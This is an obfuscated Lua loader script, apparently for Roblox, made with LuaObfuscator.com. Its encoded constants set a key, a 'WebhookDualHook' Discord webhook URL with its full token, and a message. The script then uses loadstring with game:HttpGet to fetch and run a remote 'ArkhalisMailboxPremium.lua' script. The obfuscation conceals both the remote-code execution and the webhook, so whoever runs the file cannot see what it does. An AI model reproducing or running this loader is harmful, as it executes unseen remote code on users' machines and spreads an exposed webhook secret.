--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v70=0;while true do if (v70==0) then v19=v0(v3(v30,1,1));return "";end end else local v71=v2(v0(v30,16));if v19 then local v80=0;local v81;while true do if (v80==0) then v81=v5(v71,v19);v19=nil;v80=1;end if (v80==1) then return v81;end end else return v71;end end end);local function v20(v31,v32,v33)if v33 then local v72=(v31/((1 + 1)^(v32-(2 -1))))%((879 -(282 + 595))^(((v33-(2 -1)) -(v32-(1 + 0 + 0))) + (1 -(0 + 0)))) ;return v72-(v72%(1 -0)) ;else local v73=0 -0 ;local v74;while true do if ((957 -(892 + 65))==v73) then v74=(621 -(555 + (152 -88)))^(v32-(932 -(857 + 74))) ;return (((v31%(v74 + v74))>=v74) and (569 -(367 + 201))) or (927 -(214 + 713)) ;end end end end local function v21()local v34=0;local v35;while true do if (v34==(1 -0)) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (1 -(180 -(67 + 113))) ;v34=351 -(87 + 263) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (4 -2) ;return (v37 * (189 + 67)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (11 -(6 + 2)) );v18=v18 + ((1953 -(915 + 82)) -(802 + 150)) ;return (v41 * (45169940 -28392724)) + (v40 * ((336614 -217735) -53343)) + (v39 * 256) + v38 ;end local function v24()local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1 -0)) then v45=1 + 0 ;v46=(v20(v44,1,1207 -(1069 + 118) ) * (2^32)) + v43 ;v42=4 -2 ;end if (v42==(3 -1)) then v47=v20(v44,4 + 17 ,54 -23 );v48=((v20(v44,32 + 0 )==(792 -(368 + 423))) and  -(3 -2)) or (19 -(10 + (29 -21))) ;v42=10 -7 ;end if ((11 -8)==v42) then if (v47==((1301 -(814 + 45)) -(416 + 26))) then if (v46==(0 -0)) then return v48 * (0 + 0) ;else v47=1 -0 ;v45=438 -(145 + 293) ;end elseif (v47==(2477 -(44 + 386))) then return ((v46==(1486 -((2458 -1460) + 488))) and (v48 * ((1 + 0)/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((2 + 0)^(824 -(201 + 571))))) ;end if (v42==((403 + 735) -(116 + 1022))) then v43=v23();v44=v23();v42=(889 -(261 + 624)) -3 ;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1081 -(1020 + 60)) );v18=v18 + v49 ;local v51={};for v68=1424 -(630 + 793) , #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52~=3) then else v59=nil;v60=nil;v52=14 -10 ;end if ((30 -(22 + 7))==v52) then local v75=0 + 0 ;while true do if (v75~=0) then else v55=nil;v56=nil;v75=1 + 0 ;end if (v75~=(1986 -(1266 + 719))) then else v52=605 -(268 + 335) ;break;end end end if (v52~=4) then else while true do if (v53~=0) then else v54=290 -(60 + 230) ;v55=nil;v53=573 -(426 + 146) ;end if (1~=v53) then else local v99=0;while true do if (v99~=1) then else v53=1 + 1 ;break;end if (0~=v99) then else v56=nil;v57=nil;v99=1;end end end if (v53==3) then v60=nil;while true do local v102=0;local v103;while true do if (v102==(1456 -(282 + 1174))) then v103=811 -(569 + 242) ;while true do if (0==v103) then local v128=0;while true do if (v128==(2 -1)) then v103=1 + 0 ;break;end if (v128~=(1024 -(706 + 318))) then else if (v54==(1252 -(721 + 530))) then local v162=0;while true do if (v162==2) then v54=2;break;end if (v162==(1271 -(945 + 326))) then local v166=0;while true do if (v166~=1) then else v162=2 -1 ;break;end if (v166==0) then v59=v23();v60={};v166=1 + 0 ;end end end if (v162~=1) then else local v167=0;while true do if (v167==(701 -(271 + 429))) then v162=2;break;end if (v167~=(0 + 0)) then else for v170=1,v59 do local v171=0;local v172;local v173;local v174;while true do if (v171==0) then v172=0;v173=nil;v171=1501 -(1408 + 92) ;end if ((1087 -(461 + 625))==v171) then v174=nil;while true do if (v172~=(1289 -(993 + 295))) then else if (v173==(1 + 0)) then v174=v21()~=(1171 -(418 + 753)) ;elseif (v173==(1 + 1)) then v174=v24();elseif (v173~=(1 + 2)) then else v174=v25();end v60[v170]=v174;break;end if (v172==(0 + 0)) then local v182=0 + 0 ;while true do if (v182==(529 -(406 + 123))) then v173=v21();v174=nil;v182=1;end if (v182~=(1770 -(1749 + 20))) then else v172=1 + 0 ;break;end end end end break;end end end v58[3]=v21();v167=1323 -(1249 + 73) ;end end end end end if ((1 + 1)~=v54) then else local v163=1145 -(466 + 679) ;local v164;local v165;while true do if (v163==(2 -1)) then while true do if (v164==0) then v165=0 -0 ;while true do if ((1900 -(106 + 1794))==v165) then for v175=1,v23() do local v176=0;local v177;local v178;while true do if (v176==(1 + 0)) then while true do if (v177~=(0 + 0)) then else v178=v21();if (v20(v178,2 -1 ,2 -1 )~=(114 -(4 + 110))) then else local v183=0;local v184;local v185;local v186;local v187;local v188;local v189;while true do if (v183~=(584 -(57 + 527))) then else v184=1427 -(41 + 1386) ;v185=nil;v183=104 -(17 + 86) ;end if (v183==(2 + 0)) then v188=nil;v189=nil;v183=3;end if ((1 -0)==v183) then v186=nil;v187=nil;v183=5 -3 ;end if (v183~=3) then else while true do if (v184==(168 -(122 + 44))) then v189=nil;while true do if ((1 -0)~=v185) then else v188=nil;v189=nil;v185=6 -4 ;end if (v185==(0 + 0)) then local v192=0;while true do if (0==v192) then local v193=0;while true do if (v193~=(0 + 0)) then else v186=0 -0 ;v187=nil;v193=66 -(30 + 35) ;end if ((1 + 0)~=v193) then else v192=1258 -(1043 + 214) ;break;end end end if (v192~=(3 -2)) then else v185=1213 -(323 + 889) ;break;end end end if ((5 -3)~=v185) then else while true do if (v186~=(581 -(361 + 219))) then else local v194=320 -(53 + 267) ;while true do if (v194==(0 + 0)) then v189={v22(),v22(),nil,nil};if (v187==0) then local v203=0;local v204;local v205;while true do if (v203~=0) then else v204=0 + 0 ;v205=nil;v203=1;end if (1~=v203) then else while true do if (v204~=0) then else v205=0;while true do if (v205==(850 -(20 + 830))) then v189[3 + 0 ]=v22();v189[4]=v22();break;end end break;end end break;end end elseif (v187==(127 -(116 + 10))) then v189[1 + 2 ]=v23();elseif (v187==2) then v189[3]=v23() -(2^16) ;elseif (v187~=(741 -(542 + 196))) then else local v209=0 -0 ;local v210;local v211;while true do if (v209==1) then while true do if (v210~=(0 + 0)) then else v211=0 + 0 ;while true do if (v211==(0 + 0)) then v189[7 -4 ]=v23() -(2^16) ;v189[9 -5 ]=v22();break;end end break;end end break;end if (v209~=0) then else v210=1551 -(1126 + 425) ;v211=nil;v209=1;end end end v194=1;end if (v194==1) then v186=2;break;end end end if (v186~=(407 -(118 + 287))) then else local v195=0 -0 ;local v196;local v197;while true do if (v195==(1122 -(118 + 1003))) then while true do if (v196~=0) then else v197=0;while true do if (v197~=(2 -1)) then else v186=380 -(142 + 235) ;break;end if (v197~=0) then else local v208=0 -0 ;while true do if (v208~=0) then else if (v20(v188,1 + 0 ,1)~=(978 -(553 + 424))) then else v189[2]=v60[v189[3 -1 ]];end if (v20(v188,2 + 0 ,2)~=1) then else v189[3]=v60[v189[3]];end v208=1 + 0 ;end if (v208~=1) then else v197=1;break;end end end end break;end end break;end if (v195~=0) then else v196=0 + 0 ;v197=nil;v195=1;end end end if (v186~=(0 + 0)) then else local v198=0 + 0 ;while true do if (v198==1) then v186=1;break;end if (v198==0) then local v202=0;while true do if (v202==(0 -0)) then v187=v20(v178,5 -3 ,3);v188=v20(v178,4,6);v202=1;end if (v202==(2 -1)) then v198=1;break;end end end end end if (v186~=3) then else if (v20(v188,1 + 2 ,14 -11 )==1) then v189[4]=v60[v189[757 -(239 + 514) ]];end v55[v175]=v189;break;end end break;end end break;end if (1==v184) then local v190=0;while true do if (v190~=(1 + 0)) then else v184=2;break;end if (v190~=(1329 -(797 + 532))) then else v187=nil;v188=nil;v190=1 + 0 ;end end end if ((0 + 0)~=v184) then else local v191=0;while true do if (v191~=1) then else v184=1;break;end if (0==v191) then v185=0;v186=nil;v191=1;end end end end break;end end end break;end end break;end if ((0 -0)==v176) then v177=1202 -(373 + 829) ;v178=nil;v176=732 -(476 + 255) ;end end end for v179=1131 -(369 + 761) ,v23() do v56[v179-(1 + 0) ]=v28();end v165=1 -0 ;end if (v165~=1) then else return v58;end end break;end end break;end if (v163==0) then v164=0;v165=nil;v163=1;end end end v128=1;end end end if (v103~=(1 -0)) then else if (v54~=(238 -(64 + 174))) then else local v160=0;local v161;while true do if (v160==(0 + 0)) then v161=0;while true do if (v161==(0 -0)) then local v168=336 -(144 + 192) ;while true do if (v168==0) then v55={};v56={};v168=1;end if (1==v168) then v161=217 -(42 + 174) ;break;end end end if (v161==1) then v57={};v58={v55,v56,nil,v57};v161=2;end if (v161==(1582 -(1183 + 397))) then v54=1;break;end end break;end end end break;end end break;end end end break;end if (2==v53) then local v100=0 -0 ;local v101;while true do if (v100~=0) then else v101=0;while true do if (v101~=(0 + 0)) then else local v124=0;while true do if (v124==(0 + 0)) then v58=nil;v59=nil;v124=1976 -(1913 + 62) ;end if (v124~=(1 + 0)) then else v101=2 -1 ;break;end end end if (v101~=1) then else v53=3;break;end end break;end end end end break;end if (v52~=2) then else local v76=0;while true do if ((1933 -(565 + 1368))~=v76) then else v57=nil;v58=nil;v76=3 -2 ;end if (v76~=1) then else v52=1664 -(1477 + 184) ;break;end end end if (v52==(0 -0)) then v53=0;v54=nil;v52=1 + 0 ;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==1) then v67=v61[3];return function(...)local v82=v65;local v83=v66;local v84=v67;local v85=v27;local v86=1;local v87= -1;local v88={};local v89={...};local v90=v12("#",...) -1 ;local v91={};local v92={};for v96=0,v90 do if (v96>=v84) then v88[v96-v84 ]=v89[v96 + 1 ];else v92[v96]=v89[v96 + 1 ];end end local v93=(v90-v84) + 1 ;local v94;local v95;while true do v94=v82[v86];v95=v94[1];if (v95<=3) then if (v95<=1) then if (v95==0) then local v108=0;local v109;local v110;while true do if (v108==2) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v63[v94[3]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]][v94[3]]=v94[4];v108=3;end if (v108==1) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v63[v94[3]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]][v94[3]]=v94[4];v108=2;end if (v108==4) then v86=v86 + 1 ;v94=v82[v86];v110=v94[2];v109=v92[v94[3]];v92[v110 + 1 ]=v109;v92[v110]=v109[v94[4]];v108=5;end if (v108==0) then v109=nil;v110=nil;v92[v94[2]]=v63[v94[3]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]][v94[3]]=v94[4];v108=1;end if (v108==3) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v63[v94[3]];v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v63[v94[3]];v108=4;end if (v108==5) then v86=v86 + 1 ;v94=v82[v86];v92[v94[2]]=v94[3];break;end end else v92[v94[2]]=v94[3];end elseif (v95==2) then do return;end else local v113=v94[2];local v114=v92[v94[3]];v92[v113 + 1 ]=v114;v92[v113]=v114[v94[4]];end elseif (v95<=5) then if (v95==4) then local v118=v94[2];v92[v118]=v92[v118](v13(v92,v118 + 1 ,v87));else local v120=v94[2];local v121,v122=v85(v92[v120](v13(v92,v120 + 1 ,v94[3])));v87=(v122 + v120) -1 ;local v123=0;for v125=v120,v87 do v123=v123 + 1 ;v92[v125]=v121[v123];end end elseif (v95<=6) then v92[v94[2]]();elseif (v95==7) then v92[v94[2]]=v63[v94[3]];else v92[v94[2]][v94[3]]=v94[4];end v86=v86 + 1 ;end end;end if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F472O033O004B657903153O0041726B68616C69732D50584A4F46544E5856594657030F3O00576562682O6F6B4475616C482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31303236373532303234302O3537363O372F4B5F4B38327335785544414F49445438684D59503571595135775F61316C6F6C434F7063574E79684B4A4B56547247456C4976485841756B7561385259655F726C394F7A030B3O0053656E644D652O73616765030F3O0041726B68616C69732062652O746572030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403383O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F41726B68616C69734D61696C626F785072656D69756D2E6C7561000E3O00124O00013O00304O0002000300124O00013O00304O0004000500124O00013O00304O0006000700124O00083O00122O000100093O00202O00010001000A00122O0003000B4O0005000100034O00045O00022O00063O000100012O00023O00017O00",v9(),...);end
